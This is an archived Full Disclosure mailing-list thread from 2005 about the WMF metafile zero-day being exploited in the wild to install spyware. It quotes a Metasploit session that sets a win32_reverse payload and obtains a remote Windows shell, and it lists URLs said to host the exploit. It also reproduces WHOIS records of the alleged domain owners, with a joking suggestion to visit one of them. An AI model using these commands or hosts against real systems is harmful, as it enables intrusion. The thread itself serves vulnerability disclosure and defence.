Full Disclosure mailing list archives
Re: Someone wasted a nice bug on spyware...
From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Wed, 28 Dec 2005 23:27:35 +0100
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I think you shouldnt be security specialist for putting crackz.ws in your banned website list , hehehe , this is probably the most funny warez site around there and I bet these loosers aren't knowing the number of ie exploits they are hosting on there own domain lol... Paul wrote:
Indeed, this is quite an annoyance. Buytoolbar.biz/xpl.wmf also works. I sent it to Microsoft a few days ago and they're looking into it. It looks like it's going to be a bad week at MSRC :( I whoised the owners of a couple domains who host the image and got the following information: Domain Name: BEEHAPPYY.BIZ Domain ID: D9564716-BIZ Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM Sponsoring Registrar IANA ID: 82 Domain Status: ok Registrant ID: OLNIC_919328_0_0 Registrant Name: Mikhail Sergeevich Gorbachev Registrant Organization: Mikhail Sergeevich Gorbachev Registrant Address1: Krasnaya ploshad, 1 Registrant City: Moscow Registrant State/Province: Moscow Registrant Postal Code: 176098 Registrant Country: Russian Federation Registrant Country Code: RU Registrant Phone Number: +7.0957643453 Registrant Facsimile Number: +7.0957643453 Registrant Email: mail () mailbox temp Administrative Contact ID: OLNIC_919328_1_0 Administrative Contact Name: Mikhail Sergeevich Gorbachev Administrative Contact Organization: Mikhail Sergeevich Gorbachev Administrative Contact Address1: Krasnaya ploshad, 1 Administrative Contact City: Moscow Administrative Contact State/Province: Moscow Administrative Contact Postal Code: 176098 Administrative Contact Country: Russian Federation Administrative Contact Country Code: RU Administrative Contact Phone Number: +7.0957643453 Administrative Contact Facsimile Number: +7.0957643453 Administrative Contact Email: mail () mailbox temp Billing Contact ID: OLNIC_919328_3_0 Billing Contact Name: Mikhail Sergeevich Gorbachev Billing Contact Organization: Mikhail Sergeevich Gorbachev Billing Contact Address1: Krasnaya ploshad, 1 Billing Contact City: Moscow Billing Contact State/Province: Moscow Billing Contact Postal Code: 176098 Billing Contact Country: Russian Federation Billing Contact Country Code: RU Billing Contact Phone Number: +7.0957643453 Billing Contact Facsimile Number: +7.0957643453 Billing Contact Email: mail () mailbox temp Technical Contact ID: OLNIC_919328_2_0 Technical Contact Name: Mikhail Sergeevich Gorbachev Technical Contact Organization: Mikhail Sergeevich Gorbachev Technical Contact Address1: Krasnaya ploshad, 1 Technical Contact City: Moscow Technical Contact State/Province: Moscow Technical Contact Postal Code: 176098 Technical Contact Country: Russian Federation Technical Contact Country Code: RU Technical Contact Phone Number: +7.0957643453 Technical Contact Facsimile Number: +7.0957643453 Technical Contact Email: mail () mailbox temp Name Server: NS1.PERLINK.BIZ Name Server: NS2.PERLINK.BIZ Created by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM Last Updated by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM Domain Registration Date: Tue Apr 26 15:43:16 GMT 2005 Domain Expiration Date: Wed Apr 25 23:59:59 GMT 2007 Domain Last Updated Date: Thu Aug 11 02:33:14 GMT 2005 The name Mikhail Sergeevich Gorbachev that this domain is registered to leads me to believe that it is registered with false information (for those of you who don't know, Gorbachev was a former Soviet president). Domain Name: BUYTOOLBAR.BIZ Domain ID: D11475548-BIZ Sponsoring Registrar: TLDS INC. Sponsoring Registrar IANA ID: 320 Domain Status: clientTransferProhibited Registrant ID: 6464084-SRSPLUS Registrant Name: Ezhi Brozkevitsh Registrant Organization: Ezhi Brozkevitsh Registrant Address1: Al. Armii Ludowej 24 Registrant City: Warszawa Registrant Postal Code: 00-609 Registrant Country: Poland Registrant Country Code: PL Registrant Phone Number: +21.225798400 Registrant Email: admin () buytraff biz Administrative Contact ID: 6464085-SRSPLUS Administrative Contact Name: Ezhi Brozkevitsh Administrative Contact Organization: Ezhi Brozkevitsh Administrative Contact Address1: Al. Armii Ludowej 24 Administrative Contact City: Warszawa Administrative Contact Postal Code: 00-609 Administrative Contact Country: Poland Administrative Contact Country Code: PL Administrative Contact Phone Number: +21.225798400 Administrative Contact Email: admin () buytraff biz Billing Contact ID: 6464085-SRSPLUS Billing Contact Name: Ezhi Brozkevitsh Billing Contact Organization: Ezhi Brozkevitsh Billing Contact Address1: Al. Armii Ludowej 24 Billing Contact City: Warszawa Billing Contact Postal Code: 00-609 Billing Contact Country: Poland Billing Contact Country Code: PL Billing Contact Phone Number: +21.225798400 Billing Contact Email: admin () buytraff biz Technical Contact ID: 6464086-SRSPLUS Technical Contact Name: Ezhi Brozkevitsh Technical Contact Organization: Ezhi Brozkevitsh Technical Contact Address1: Al. Armii Ludowej 24 Technical Contact City: Warszawa Technical Contact Postal Code: 00-609 Technical Contact Country: Poland Technical Contact Country Code: PL Technical Contact Phone Number: +21.225798400 Technical Contact Email: admin () buytraff biz Name Server: NS1.BUYTOOLBAR.BIZ Name Server: NS2.BUYTOOLBAR.BIZ Created by Registrar: TLDS INC. Last Updated by Registrar: TLDS INC. Domain Registration Date: Mon Nov 14 08:00:27 GMT 2005 Domain Expiration Date: Mon Nov 13 23:59:59 GMT 2006 Domain Last Updated Date: Mon Nov 14 11:16:52 GMT 2005 This information does look promising. Iframeurl.biz is also registered to the same individual. Perhaps the Polish authorities could apprehend this culprit (either that, or a Polish reader of full-disclosure could pay him a visit ;). That is, of course, assuming he is stupid enough to use his real name to register a domain for illegal use. Regards, Paul Greyhats Security http://greyhatsecurity.org -----Original Message----- From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of Eric Sites Sent: Tuesday, December 27, 2005 11:02 PM To: full-disclosure () lists grok org uk Subject: RE: [Full-disclosure] Someone wasted a nice bug on spyware... We are seeing a lot of website picking this exploit up. Examples: DON'T CLICK Crackz.ws unionseek.com/d/t1/wmf_exp.htm beehappyy.biz/parthner3/xpl.wmf http://www.tfcco.com/xpl.wmf Iframeurl.biz Cheers, Eric Sites VP of Research & Development Sunbelt Software email: eric () sunbelt-software com Voice: 1-727-562-0101 x 276 Cell: 1-727-637-2414 Fax: 1-727-562-5199 Web: http://www.sunbelt-software.com Physical Address: 101 N Garden Ave, Suite 120 Clearwater, FL, 33755 United States -----Original Message----- From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of H D Moore Sent: Tuesday, December 27, 2005 10:57 PM To: full-disclosure () lists grok org uk Subject: [Full-disclosure] Someone wasted a nice bug on spyware... In reference to: http://www.securityfocus.com/archive/1/420288/30/0/threaded I ported the exploit to the Metasploit Framework in case anyone wants to test it without installing a thousand spyware apps... Available from 'msfupdate' for MSF users, or in the 2.5 snapshot: --http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metaf ile --http://metasploit.com/tools/framework-2.5-snapshot.tar.gz Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1. -HD + -- --=[ msfconsole v2.5 [147 exploits - 77 payloads] msf > use ie_xp_pfv_metafile msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2 LHOST -> 192.168.0.2 msf ie_xp_pfv_metafile(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Waiting for connections to http://0.0.0.0:8080/anything.wmf [*] HTTP Client connected from 192.168.0.219:1060 using Windows XP [*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\XXXX\Desktop> On Tuesday 27 December 2005 14:20, noemailpls@noemail.ziper wrote:Warning the following URL successfully exploited a fully patched windows xp system with a freshly updated norton anti virus. unionseek.com/d/t1/wmf_exp.htm The url runs a .wmf and executes the virus, f-secure will pick up the virus norton will not._______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ7MRVq+LRXunxpxfAQITRg//dSLUa67EmG/r0v+2/rN6QxmkrbdZ9oF9 2v089NF4Hc9Ms/BcH8u61ZHXXJ3Ht2nMNpbhucsxH58rT9pZyGNQzOFs1qBxsymn /PHlIQPQuJrbLtODHDeTdnX+7WClRQdXkbysNzEEBJeFnvFlkNIHLMfizRqVKNS1 WRGftGKKGlvmQhVs9poIpYyUK5mirTU83L2sWQswFR6DcZj+yuvPnhpp4dRfsC2M oMxwLMVe2eyZvtCZucdluVX6Z/jWfdC7ZTxzKyCrRlrkmmR6ItXP5HhVqq4hodhz gG5KGx2Qa4DJS1kMw6mXMhg2OoWhaHEDHOv7S5XKINlPHaQzv/HxAssOdjjShxVZ ZvmozA7odlWmSvlz6SkJYNZjxBDvzFvIg86SMXe/s3mh3zZuBbxVyQ9vEw0v8JA1 /500hCIQ2fM0jNzRbcYwFkzrWSTL/vWBTes3q6s4YLNx/XQfMZE+YSgFYcuGEqh1 0lDeNzu/J8E2mnfJLLe0qMMeRzXvZOIe4cU3kYHINzSl0XiSdwNylrKSVyIuWYc4 7eD41YD3LQIjhL+nWYG8pSdsyceQLrUO0+s0L5mQCkTFRpzJp5mag0DnU4IugfyI wLSe3jesj3VOhQeeVgB4ZPdxrh3ukmqumJVKZhgdE4uVgsSuiNvWCyYigM0TCC18 TID7YC6EZD8= =SY6l -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Someone wasted a nice bug on spyware... H D Moore (Dec 27)
- Re: Someone wasted a nice bug on spyware... Jerome Athias (Dec 28)
- Re: Someone wasted a nice bug on spyware... Morning Wood (Dec 28)
- Re: Someone wasted a nice bug on spyware... Nick FitzGerald (Dec 28)
- Re: Someone wasted a nice bug on spyware... H D Moore (Dec 28)
- <Possible follow-ups>
- RE: Someone wasted a nice bug on spyware... Eric Sites (Dec 27)
- RE: Someone wasted a nice bug on spyware... Paul (Dec 27)
- Re: Someone wasted a nice bug on spyware... Tomasz Kokowski (Dec 28)
- Re: Someone wasted a nice bug on spyware... ad () heapoverflow com (Dec 28)
- RE: Someone wasted a nice bug on spyware... Paul (Dec 27)
- Re: Someone wasted a nice bug on spyware... Patrick Dickey (Dec 28)
- RE: Re: Someone wasted a nice bug on spyware... Peter Ferrie (Dec 28)
- Re: Re: Someone wasted a nice bug on spyware... fok yo (Dec 29)
- RE: Re: Someone wasted a nice bug on spyware... Peter Ferrie (Dec 28)
- Re: Someone wasted a nice bug on spyware... Jerome Athias (Dec 28)